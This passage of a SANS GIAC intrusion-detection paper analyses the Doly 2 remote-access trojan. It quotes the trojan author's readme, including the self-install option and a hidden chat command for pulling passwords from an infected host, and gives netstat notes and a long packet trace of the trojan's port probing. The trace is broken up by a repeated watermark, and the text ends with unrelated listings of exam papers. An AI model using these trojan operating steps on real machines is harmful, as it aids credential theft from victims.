know: Server is SAFE for local install! (You may run it on your computer and he will not install him self or do any damage) - If you want to see the server Action Just run the sever with the command of /ShowMe (Server.exe /ShowMe) - If you installed the server and you don't know how to close it (you run it without the /ShowMe command) Key fingerprint just restart = AF19 it will FA27 be fine 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 - If you guys out there want to make the server install him self you may do it if you wish and i put a little something for you there if you run the server with a program command it will run it Guy Bruneau Page 18 of 1

20 with the server (Like a file joiner without the Merged file) - (Server.exe c:\program files\icq\icq.exe) - If you want to get server passwords (its not in the command window) do this: In the main window make sure your show status window is checked - you should see a little face in the right bottom screen, click on it with the right mouse button and click on "ask me a question" and Enter this (without the ") : "send this : 0`pas?" That's it passwords should be on the way - Please do not mess around with the raw sending Cu'z there are things you don't know and might Crash the server - this is for admin use only... - If you want to get the screen capture plug - the dll is in the site with the info on installation - Netstat observation This picture shows (top) the workstation listening on TCP port 6789 after the workstation has been infected. The bottom half of the picture shows that user has connected twice to the infected computer and is still listening on port This is also reflected later with the Snort trace. NETSTAT connections 3. Network traces: Guy Bruneau Page 19 of 1

21 This detect reflect Doly 2 Trojan scanner 21:09: cloak.erin.ca.1059 > Starbase1.erin.ca.3456: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xa (E)] 450a b e241 c0a8 1e0f E..@...A... c0a8 1e0a d80 002e 9e #... b ac P... 21:09: Starbase1.erin.ca.3456 > cloak.erin.ca.1059: R 0:0(0) ack win a a8ec c0a8 1e0a E..(.z..@... c0a8 1e0f 0d e 9e12...# P...B... 21:09: cloak.erin.ca.1059 > Starbase1.erin.ca.3456: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xa (E)] 450a c e141 c0a8 1e0f E..@...A... c0a8 1e0a d80 002e 9e #... Key b002 fingerprint 2000 ac50 = AF FA F D 0300 FDB5.. DE3D..P... F8B5 06E4 A169 4E46 21:09: Starbase1.erin.ca.3456 > cloak.erin.ca.1059: R 0:0(0) ack 1 win a50d c0a8 1e0a E..(.Y..@... c0a8 1e0f 0d e 9e12...# P...B... 21:09: cloak.erin.ca.1059 > Starbase1.erin.ca.3456: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xa (E)] 450a d e041 c0a8 1e0f E..@...A... c0a8 1e0a d80 002e 9e #... b ac P... 21:09: Starbase1.erin.ca.3456 > cloak.erin.ca.1059: R 0:0(0) ack 1 win d c0a8 1e0a E..(H...@.uM... c0a8 1e0f 0d e 9e12...# P...B... 21:09: cloak.erin.ca.1059 > Starbase1.erin.ca.3456: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xa (E)] 450a e df41 c0a8 1e0f E..@...A... c0a8 1e0a d80 002e 9e #... b ac P... 21:09: Starbase1.erin.ca.3456 > cloak.erin.ca.1059: R 0:0(0) ack 1 win e6 c0a8 1e0a E..()...@... c0a8 1e0f 0d e 9e12...# P...B... 21:09: cloak.erin.ca.1060 > Starbase1.erin.ca.4567: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xb (EC)] 450b f de40 c0a8 1e0f E..@...@... c0a8 1e0a d7 002e a47d $...}... b a18c :09: Starbase1.erin.ca.4567 > cloak.erin.ca.1060: R 0:0(0) ack win e e c0a8 1e0a E..(v...@.F~... c0a8 1e0f 11d e a47e...$...~ bf 0000 P :09: cloak.erin.ca.1060 > Starbase1.erin.ca.4567: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xb (EC)] 450b 0040 a dd40 c0a8 1e0f E..@...@... c0a8 1e0a d7 002e a47d $...}... b a18c :09: Starbase1.erin.ca.4567 > cloak.erin.ca.1060: R 0:0(0) ack 1 win 0 Key 4500 fingerprint a40 = AF FA F94 c0a8 998D 1e0a FDB5 E..(:@..@..&... DE3D F8B5 06E4 A169 4E46 c0a8 1e0f 11d e a47e...$...~ bf 0000 P :09: cloak.erin.ca.1060 > Starbase1.erin.ca.4567: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xb (EC)] Guy Bruneau Page 20 of 1

22 450b 0040 a dc40 c0a8 1e0f c0a8 1e0a d7 002e a47d $...}... b a18c :09: Starbase1.erin.ca.4567 > cloak.erin.ca.1060: R 0:0(0) ack 1 win e efd c0a8 1e0a E..(ni..@.N... c0a8 1e0f 11d e a47e...$...~ bf 0000 P :09: cloak.erin.ca.1060 > Starbase1.erin.ca.4567: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xb (EC)] 450b 0040 a db40 c0a8 1e0f E..@...@... c0a8 1e0a d7 002e a47d $...}... b a18c :09: Starbase1.erin.ca.4567 > cloak.erin.ca.1060: R 0:0(0) ack 1 win a a4c6 c0a8 1e0a E..(...@... c0a8 1e0f 11d e a47e...$...~ bf 0000 P :09: Key fingerprint cloak.erin.ca.1061 = AF19 FA27 2F94 > Starbase1.erin.ca.5678: 998D FDB5 DE3D F8B5 S : (0) 06E4 A169 4E46 win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xc] 450c 0040 a da3f c0a8 1e0f E..@...?... c0a8 1e0a e 002e ab %... b a :09: Starbase1.erin.ca.5678 > cloak.erin.ca.1061: R 0:0(0) ack win bf a7 c0a8 1e0a E..(U...@.g... c0a8 1e0f 162e e ab09...% cdc 0000 P...,... 21:09: cloak.erin.ca.1061 > Starbase1.erin.ca.5678: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xc] 450c 0040 a d93f c0a8 1e0f E..@...?... c0a8 1e0a e 002e ab %... b a :09: Starbase1.erin.ca.5678 > cloak.erin.ca.1061: R 0:0(0) ack 1 win e ed2 c0a8 1e0a E..(...@... c0a8 1e0f 162e e ab09...% cdc 0000 P...,... 21:09: cloak.erin.ca.1061 > Starbase1.erin.ca.5678: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xc] 450c 0040 a d83f c0a8 1e0f E..@...?... c0a8 1e0a e 002e ab %... b a :09: Starbase1.erin.ca.5678 > cloak.erin.ca.1061: R 0:0(0) ack 1 win f5 c0a8 1e0a E..(gq..@.U... c0a8 1e0f 162e e ab09...% cdc 0000 P...,... 21:09: cloak.erin.ca.1061 > Starbase1.erin.ca.5678: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xc] 450c 0040 a d73f c0a8 1e0f E..@...?... c0a8 1e0a e 002e ab %... b a :09: Starbase1.erin.ca.5678 > cloak.erin.ca.1061: R 0:0(0) ack 1 win f ae15 c0a8 1e0a E..(.Q..@... c0a8 1e0f 162e e ab09...% cdc 0000 P...,... 21:09: cloak.erin.ca.1062 > Starbase1.erin.ca.6789: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xd (C)] 450d 0040 a d63e c0a8 1e0f E..@...>... Key c0a8 fingerprint 1e0a 0426 = AF19 1a85 002e FA27 b160 2F D 0000 FDB5...&...`... DE3D F8B5 06E4 A169 4E46 b bf :09: Starbase1.erin.ca.6789 > cloak.erin.ca.1062: R 0:0(0) ack win e f5f c0a8 1e0a E..(n...@.O_... Guy Bruneau Page 21 of 1

23 c0a8 1e0f 1a e b161...&...a c 0000 P...",.. 21:09: cloak.erin.ca.1062 > Starbase1.erin.ca.6789: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xd (C)] 450d 0040 a d53e c0a8 1e0f E..@...>... c0a8 1e0a a85 002e b &...`... b bf :09: Starbase1.erin.ca.6789 > cloak.erin.ca.1062: R 0:0(0) ack 1 win cf c0a8 1e0a E..(c...@.Y... c0a8 1e0f 1a e b161...&...a c 0000 P...",.. 21:09: cloak.erin.ca.1062 > Starbase1.erin.ca.6789: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xd (C)] 450d 0040 a d43e c0a8 1e0f E..@...>... c0a8 1e0a a85 002e b &...`... b bf :09: Key fingerprint Starbase1.erin.ca.6789 = AF19 FA27 2F94 > 998D cloak.erin.ca.1062: FDB5 DE3D F8B5 R 0:0(0) 06E4 ack A169 1 win 4E a742 c0a8 1e0a E..(.$..@..B... c0a8 1e0f 1a e b161...&...a c 0000 P...",.. 21:09: cloak.erin.ca.1062 > Starbase1.erin.ca.6789: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xd (C)] 450d 0040 aa d33e c0a8 1e0f E..@...>... c0a8 1e0a a85 002e b &...`... b bf :09: Starbase1.erin.ca.6789 > cloak.erin.ca.1062: R 0:0(0) ack 1 win c0a8 1e0a E..(F...@.w`... c0a8 1e0f 1a e b161...&...a c 0000 P...",.. 21:09: cloak.erin.ca.1063 > Starbase1.erin.ca.7890: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xe (E)] 450e 0040 ab d23d c0a8 1e0f E..@...=... c0a8 1e0a ed2 002e b7e '... b %... 21:09: Starbase1.erin.ca.7890 > cloak.erin.ca.1063: R 0:0(0) ack win a bafc c0a8 1e0a E..(.j..@... c0a8 1e0f 1ed e b7e7...' P...X.. 21:09: cloak.erin.ca.1063 > Starbase1.erin.ca.7890: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xe (E)] 450e 0040 ac d13d c0a8 1e0f E..@...=... c0a8 1e0a ed2 002e b7e '... b %... 21:09: Starbase1.erin.ca.7890 > cloak.erin.ca.1063: R 0:0(0) ack 1 win f dde c0a8 1e0a E..(o...@.M... c0a8 1e0f 1ed e b7e7...' P...X.. 21:10: cloak.erin.ca.1063 > Starbase1.erin.ca.7890: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xe (E)] 450e 0040 ad d03d c0a8 1e0f E..@...=... c0a8 1e0a ed2 002e b7e '... b %... 21:10: Starbase1.erin.ca.7890 > cloak.erin.ca.1063: R 0:0(0) ack 1 win aa bc c0a8 1e0a E..(d...@.X... c0a8 1e0f 1ed e b7e7...'... Key 5014 fingerprint = AF FA27 2F94 998D FDB5 P...X.. DE3D F8B5 06E4 A169 4E46 21:10: cloak.erin.ca.1063 > Starbase1.erin.ca.7890: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xe (E)] 450e 0040 ae cf3d c0a8 1e0f E..@...=... c0a8 1e0a ed2 002e b7e '... Guy Bruneau Page 22 of 1

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

CIS-331 Exam 2 Spring 2016 Total of 110 Points Version 1

CIS-331 Exam 2 Spring 2016 Total of 110 Points Version 1 Version 1 1. (20 Points) Given the class A network address 121.0.0.0 will be divided into multiple subnets. a. (5 Points) How many bits will be necessary to address 8,100 subnets? b. (5 Points) What is

More information

CIS-331 Fall 2013 Exam 1 Name: Total of 120 Points Version 1

CIS-331 Fall 2013 Exam 1 Name: Total of 120 Points Version 1 Version 1 1. (24 Points) Show the routing tables for routers A, B, C, and D. Make sure you account for traffic to the Internet. NOTE: Router E should only be used for Internet traffic. Router A Router

More information

CIS-331 Spring 2016 Exam 1 Name: Total of 109 Points Version 1

CIS-331 Spring 2016 Exam 1 Name: Total of 109 Points Version 1 Version 1 Instructions Write your name on the exam paper. Write your name and version number on the top of the yellow paper. Answer Question 1 on the exam paper. Answer Questions 2-4 on the yellow paper.

More information

CIS-331 Fall 2014 Exam 1 Name: Total of 109 Points Version 1

CIS-331 Fall 2014 Exam 1 Name: Total of 109 Points Version 1 Version 1 1. (24 Points) Show the routing tables for routers A, B, C, and D. Make sure you account for traffic to the Internet. Router A Router B Router C Router D Network Next Hop Next Hop Next Hop Next

More information

CIS-331 Exam 2 Fall 2015 Total of 105 Points Version 1

CIS-331 Exam 2 Fall 2015 Total of 105 Points Version 1 Version 1 1. (20 Points) Given the class A network address 117.0.0.0 will be divided into multiple subnets. a. (5 Points) How many bits will be necessary to address 4,000 subnets? b. (5 Points) What is

More information

FOCUS on Intrusion Detection: Intrusion Detection Level Analysis of Nmap and Queso Page 1 of 6

FOCUS on Intrusion Detection: Intrusion Detection Level Analysis of Nmap and Queso Page 1 of 6 FOCUS on Intrusion Detection: Intrusion Detection Level Analysis of Nmap and Queso Page 1 of 6 Intrusion Detection Level Analysis of Nmap and Queso by Toby Miller last updated Wednesday, August 30, 2000

More information

CIS-331 Exam 2 Fall 2014 Total of 105 Points. Version 1

CIS-331 Exam 2 Fall 2014 Total of 105 Points. Version 1 Version 1 1. (20 Points) Given the class A network address 119.0.0.0 will be divided into a maximum of 15,900 subnets. a. (5 Points) How many bits will be necessary to address the 15,900 subnets? b. (5

More information

CIS-331 Final Exam Spring 2015 Total of 115 Points. Version 1

CIS-331 Final Exam Spring 2015 Total of 115 Points. Version 1 Version 1 1. (25 Points) Given that a frame is formatted as follows: And given that a datagram is formatted as follows: And given that a TCP segment is formatted as follows: Assuming no options are present

More information

Global Information Assurance Certification Paper

Global Information Assurance Certification Paper Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

CIS-331 Final Exam Spring 2018 Total of 120 Points. Version 1

CIS-331 Final Exam Spring 2018 Total of 120 Points. Version 1 Version 1 Instructions 1. Write your name and version number on the top of the yellow paper and the routing tables sheet. 2. Answer Question 2 on the routing tables sheet. 3. Answer Questions 1, 3, 4,

More information

CIS-331 Final Exam Spring 2016 Total of 120 Points. Version 1

CIS-331 Final Exam Spring 2016 Total of 120 Points. Version 1 Version 1 1. (25 Points) Given that a frame is formatted as follows: And given that a datagram is formatted as follows: And given that a TCP segment is formatted as follows: Assuming no options are present

More information

! ' ,-. +) +))+, /+*, 2 01/)*,, 01/)*, + 01/+*, ) 054 +) +++++))+, ) 05,-. /,*+), 01/-*+) + 01/.*+)

! ' ,-. +) +))+, /+*, 2 01/)*,, 01/)*, + 01/+*, ) 054 +) +++++))+, ) 05,-. /,*+), 01/-*+) + 01/.*+) ! "#! # $ %& #! '!!!( &!)'*+' '(,-. +) /,*+), 01/-*+) + 01/.*+) ) 05,-. +))+, /+*, 2 01/)*,, 01/)*, + 01/+*, ) 054 +) +++++))+,3 4 +. 6*! ) ) ) ) 5 ) ) ) ) + 5 + + ) ) ) 5 9 + ) ) + 5 4 ) ) + ) 5, ) )

More information

CIS-331 Final Exam Fall 2015 Total of 120 Points. Version 1

CIS-331 Final Exam Fall 2015 Total of 120 Points. Version 1 Version 1 1. (25 Points) Given that a frame is formatted as follows: And given that a datagram is formatted as follows: And given that a TCP segment is formatted as follows: Assuming no options are present

More information

Layered Networking and Port Scanning

Layered Networking and Port Scanning Layered Networking and Port Scanning David Malone 22nd June 2004 1 IP Header IP a way to phrase information so it gets from one computer to another. IPv4 Header: Version Head Len ToS Total Length 4 bit

More information

Global Information Assurance Certification Paper

Global Information Assurance Certification Paper Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

SCP SC Network Defense and Countermeasures (NDC) Exam.

SCP SC Network Defense and Countermeasures (NDC) Exam. SCP SC0-402 Network Defense and Countermeasures (NDC) Exam TYPE: DEMO http://www.examskey.com/sc0-402.html Examskey SCP SC0-402 exam demo product is here for you to test the quality of the product. This

More information

The cache is 4-way set associative, with 4-byte blocks, and 16 total lines

The cache is 4-way set associative, with 4-byte blocks, and 16 total lines Sample Problem 1 Assume the following memory setup: Virtual addresses are 20 bits wide Physical addresses are 15 bits wide The page size if 1KB (2 10 bytes) The TLB is 2-way set associative, with 8 total

More information

Fall 2003 Wincati Issue

Fall 2003 Wincati Issue Fall 2003 Wincati Issues SUMMARY...2 OVERVIEW...2 HISTORY...2 TECHNICAL DETAILS...2 ANALYSIS...3 DATA-GATHERING...3 RESULTS...3 Wincati...3 Efi Fiery Server ZX...3 WHAT REMAINS...3 LESSONS LEARNED...3

More information

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version:

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version: ID: 42417 Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

Detecting Specific Threats

Detecting Specific Threats The following topics explain how to use preprocessors in a network analysis policy to detect specific threats: Introduction to Specific Threat Detection, page 1 Back Orifice Detection, page 1 Portscan

More information

On Assessing the Impact of Ports Scanning on the Target Infrastructure

On Assessing the Impact of Ports Scanning on the Target Infrastructure 2018 On Assessing the Impact of Ports Scanning on the Target Infrastructure Dr Mahdi Aiash 4/24/2018 1. Introduction A port scan is a method for determining which ports on a network are open. As ports

More information

4. Specifications and Additional Information

4. Specifications and Additional Information 4. Specifications and Additional Information AGX52004-1.0 8B/10B Code This section provides information about the data and control codes for Arria GX devices. Code Notation The 8B/10B data and control

More information

CIT 480: Securing Computer Systems

CIT 480: Securing Computer Systems CIT 480: Securing Computer Systems Scanning CIT 480: Securing Computer Systems Slide #1 Topics 1. Port Scanning 2. Stealth Scanning 3. Version Identification 4. OS Fingerprinting CIT 480: Securing Computer

More information

Configuring attack detection and prevention 1

Configuring attack detection and prevention 1 Contents Configuring attack detection and prevention 1 Overview 1 Attacks that the device can prevent 1 Single-packet attacks 1 Scanning attacks 2 Flood attacks 3 TCP fragment attack 4 Login DoS attack

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

Layer 4: UDP, TCP, and others. based on Chapter 9 of CompTIA Network+ Exam Guide, 4th ed., Mike Meyers

Layer 4: UDP, TCP, and others. based on Chapter 9 of CompTIA Network+ Exam Guide, 4th ed., Mike Meyers Layer 4: UDP, TCP, and others based on Chapter 9 of CompTIA Network+ Exam Guide, 4th ed., Mike Meyers Concepts application set transport set High-level, "Application Set" protocols deal only with how handled

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

Intrusion Detection System (IDS) IT443 Network Security Administration Slides courtesy of Bo Sheng

Intrusion Detection System (IDS) IT443 Network Security Administration Slides courtesy of Bo Sheng Intrusion Detection System (IDS) IT443 Network Security Administration Slides courtesy of Bo Sheng 1 Internet Security Mechanisms Prevent: Firewall, IPsec, SSL Detect: Intrusion Detection Survive/ Response:

More information

C1098 JPEG Module User Manual

C1098 JPEG Module User Manual C1098 JPEG Module User Manual General Description C1098 is VGA camera module performs as a JPEG compressed still camera that can be attached to a wireless or PDA host. Users can send out a snapshot command

More information

Configuring attack detection and prevention 1

Configuring attack detection and prevention 1 Contents Configuring attack detection and prevention 1 Overview 1 Attacks that the device can prevent 1 Single-packet attacks 1 Scanning attacks 2 Flood attacks 3 TCP fragment attack 4 Login DoS attack

More information

Global Information Assurance Certification Paper

Global Information Assurance Certification Paper Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

inside: THE MAGAZINE OF USENIX & SAGE April 2002 Volume 27 Number 2 SECURITY A Remote Active OS Fingerprinting Tool Using ICMP BY OFIR ARKIN

inside: THE MAGAZINE OF USENIX & SAGE April 2002 Volume 27 Number 2 SECURITY A Remote Active OS Fingerprinting Tool Using ICMP BY OFIR ARKIN THE MAGAZINE OF USENIX & SAGE April 2002 Volume 27 Number 2 inside: SECURITY A Remote Active OS Fingerprinting Tool Using ICMP BY OFIR ARKIN & The Advanced Computing Systems Association & The System Administrators

More information

NIDS: Snort. Group 8. Niccolò Bisagno, Francesco Fiorenza, Giulio Carlo Gialanella, Riccardo Isoli

NIDS: Snort. Group 8. Niccolò Bisagno, Francesco Fiorenza, Giulio Carlo Gialanella, Riccardo Isoli NIDS: Snort Group 8 Niccolò Bisagno, Francesco Fiorenza, Giulio Carlo Gialanella, Riccardo Isoli 1 Summary NIDS Snort Syn Flood Attack Exploit Kit Detection: Bleeding Life Packet Level Evasion Snort as

More information

Network Security: Scan

Network Security: Scan Network Security: Scan Seungwon Shin, KAIST some slides from Dr. Brett Tjaden More about Scan Scan Techniques Network scanning where is a target? which service is available on a target? can I have more

More information

Scan Results - ( Essentials - Onsharp )

Scan Results -   ( Essentials - Onsharp ) Scan Results - www.onsharp.com ( Essentials - Onsharp ) Overview Open Ports (18) Scan ID: 7675527 Target: www.onsharp.com Max Score: 2.6 Compliance: Passing PCI compliance, Expires undefined Profile: 15

More information

Means for Intrusion Detection. Intrusion Detection. INFO404 - Lecture 13. Content

Means for Intrusion Detection. Intrusion Detection. INFO404 - Lecture 13. Content Intrusion Detection INFO404 - Lecture 13 21.04.2009 nfoukia@infoscience.otago.ac.nz Content Definition Network vs. Host IDS Misuse vs. Behavior Based IDS Means for Intrusion Detection Definitions (1) Intrusion:

More information

Applied IT Security. System Security. Dr. Stephan Spitz 6 Firewalls & IDS. Applied IT Security, Dr.

Applied IT Security. System Security. Dr. Stephan Spitz 6 Firewalls & IDS. Applied IT Security, Dr. Applied IT Security System Security Dr. Stephan Spitz Stephan.Spitz@de.gi-de.com Overview & Basics System Security Network Protocols and the Internet Operating Systems and Applications Operating System

More information

INF5290 Ethical Hacking. Lecture 3: Network reconnaissance, port scanning. Universitetet i Oslo Laszlo Erdödi

INF5290 Ethical Hacking. Lecture 3: Network reconnaissance, port scanning. Universitetet i Oslo Laszlo Erdödi INF5290 Ethical Hacking Lecture 3: Network reconnaissance, port scanning Universitetet i Oslo Laszlo Erdödi Lecture Overview Identifying hosts in a network Identifying services on a host What are the typical

More information

Packet Capturing with TCPDUMP command in Linux

Packet Capturing with TCPDUMP command in Linux Packet Capturing with TCPDUMP command in Linux In this tutorial we will be looking into a very well known tool in Linux system administrators tool box. Some times during troubleshooting this tool proves

More information

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without

More information

UNH-IOL MIPI Alliance Test Program

UNH-IOL MIPI Alliance Test Program DSI Receiver Protocol Conformance Test Report UNH-IOL 121 Technology Drive, Suite 2 Durham, NH 03824 +1-603-862-0090 mipilab@iol.unh.edu +1-603-862-0701 Engineer Name engineer@company.com Panel Company

More information

Certified Ethical Hacker

Certified Ethical Hacker Certified Ethical Hacker ECCouncil 312-49 Dumps Available Here at: /eccouncil-exam/312-49-dumps.html Enrolling now you will get access to 316 questions in a unique set of 312-49 dumps Question 1 When an

More information

Clarify Firepower Threat Defense Access Control Policy Rule Actions

Clarify Firepower Threat Defense Access Control Policy Rule Actions Clarify Firepower Threat Defense Access Control Policy Rule Actions Contents Introduction Prerequisites Requirements Components Used Background Information How ACP is Deployed Configure ACP Available Actions

More information

The Case for Teaching Network Protocols to Computer Forensics Examiners

The Case for Teaching Network Protocols to Computer Forensics Examiners The Case for Teaching Network Protocols to Computer Forensics Examiners Conference on Digital Forensics, Security and Law Arlington, VA April 20, 2007 Gary C. Kessler Champlain College Center for Digital

More information

Application Note 11. Main mode IPSec between a Windows 2000 / XP (responder) and a Digi Transport Router (initiator)

Application Note 11. Main mode IPSec between a Windows 2000 / XP (responder) and a Digi Transport Router (initiator) Application Note 11 Main mode IPSec between a Windows 2000 / XP (responder) and a Digi Transport Router (initiator) November 2015 Contents 1 Introduction... 5 1.1 Outline... 5 2 Assumptions... 6 2.1 Corrections...

More information

Scanning. Course Learning Outcomes for Unit III. Reading Assignment. Unit Lesson UNIT III STUDY GUIDE

Scanning. Course Learning Outcomes for Unit III. Reading Assignment. Unit Lesson UNIT III STUDY GUIDE UNIT III STUDY GUIDE Course Learning Outcomes for Unit III Upon completion of this unit, students should be able to: 1. Recall the terms port scanning, network scanning, and vulnerability scanning. 2.

More information

Exam Questions CEH-001

Exam Questions CEH-001 Exam Questions CEH-001 Certified Ethical Hacker (CEH) https://www.2passeasy.com/dumps/ceh-001/ 1. A company is legally liable for the content of email that is sent from its systems, regardless of whether

More information

K2289: Using advanced tcpdump filters

K2289: Using advanced tcpdump filters K2289: Using advanced tcpdump filters Non-Diagnostic Original Publication Date: May 17, 2007 Update Date: Sep 21, 2017 Topic Introduction Filtering for packets using specific TCP flags headers Filtering

More information

Internet Layers. Physical Layer. Application. Application. Transport. Transport. Network. Network. Network. Network. Link. Link. Link.

Internet Layers. Physical Layer. Application. Application. Transport. Transport. Network. Network. Network. Network. Link. Link. Link. Internet Layers Application Application Transport Transport Network Network Network Network Link Link Link Link Ethernet Fiber Optics Physical Layer Wi-Fi ARP requests and responses IP: 192.168.1.1 MAC:

More information

ASA Access Control. Section 3

ASA Access Control. Section 3 [ 39 ] CCNP Security Firewall 642-617 Quick Reference Section 3 ASA Access Control Now that you have connectivity to the ASA and have configured basic networking settings on the ASA, you can start to look

More information

Experiment 2: Wireshark as a Network Protocol Analyzer

Experiment 2: Wireshark as a Network Protocol Analyzer Experiment 2: Wireshark as a Network Protocol Analyzer Learning Objectives: To become familiarized with the Wireshark application environment To perform basic PDU capture using Wireshark To perform basic

More information

SANS SEC504. Hacker Tools, Techniques, Exploits and Incident Handling.

SANS SEC504. Hacker Tools, Techniques, Exploits and Incident Handling. SANS SEC504 Hacker Tools, Techniques, Exploits and Incident Handling http://killexams.com/exam-detail/sec504 QUESTION: 315 Which of the following techniques can be used to map 'open' or 'pass through'

More information

Chair for Network Architectures and Services Department of Informatics TU München Prof. Carle. Network Security. Chapter 8

Chair for Network Architectures and Services Department of Informatics TU München Prof. Carle. Network Security. Chapter 8 Chair for Network Architectures and Services Department of Informatics TU München Prof. Carle Network Security Chapter 8 System Vulnerabilities and Denial of Service Attacks System Vulnerabilities and

More information

Michael Rash DEFCON 12 07/31/2004

Michael Rash DEFCON 12 07/31/2004 Advanced Netfilter: Content Replacement (ala Snort_inline) and Combining Port Knocking with p0f Michael Rash DEFCON 12 07/31/2004 http://www.enterasys.com http://www.cipherdyne.org Introduction Port knocking

More information

Configuring Anomaly Detection

Configuring Anomaly Detection CHAPTER 12 This chapter describes how to create multiple security policies and apply them to individual virtual sensors. It contains the following sections: Understanding Policies, page 12-1 Anomaly Detection

More information

Single Network: applications, client and server hosts, switches, access links, trunk links, frames, path. Review of TCP/IP Internetworking

Single Network: applications, client and server hosts, switches, access links, trunk links, frames, path. Review of TCP/IP Internetworking 1 Review of TCP/IP working Single Network: applications, client and server hosts, switches, access links, trunk links, frames, path Frame Path Chapter 3 Client Host Trunk Link Server Host Panko, Corporate

More information

CSE/EE 461 Lecture 13 Connections and Fragmentation. TCP Connection Management

CSE/EE 461 Lecture 13 Connections and Fragmentation. TCP Connection Management CSE/EE 461 Lecture 13 Connections and Fragmentation Tom Anderson tom@cs.washington.edu Peterson, Chapter 5.2 TCP Connection Management Setup assymetric 3-way handshake Transfer sliding window; data and

More information

CSC 574 Computer and Network Security. TCP/IP Security

CSC 574 Computer and Network Security. TCP/IP Security CSC 574 Computer and Network Security TCP/IP Security Alexandros Kapravelos kapravelos@ncsu.edu (Derived from slides by Will Enck and Micah Sherr) Network Stack, yet again Application Transport Network

More information

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Last revised 10-4-17 KonBoot Get into any account without the password Works on Windows and Linux No longer free Link Ch 5r From the

More information

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Last revised 1-11-17 KonBoot Get into any account without the password Works on Windows and Linux No longer free Link Ch 5r From the

More information

Dan Lo Department of Computer Science and Software Engineering Southern Polytechnic State University

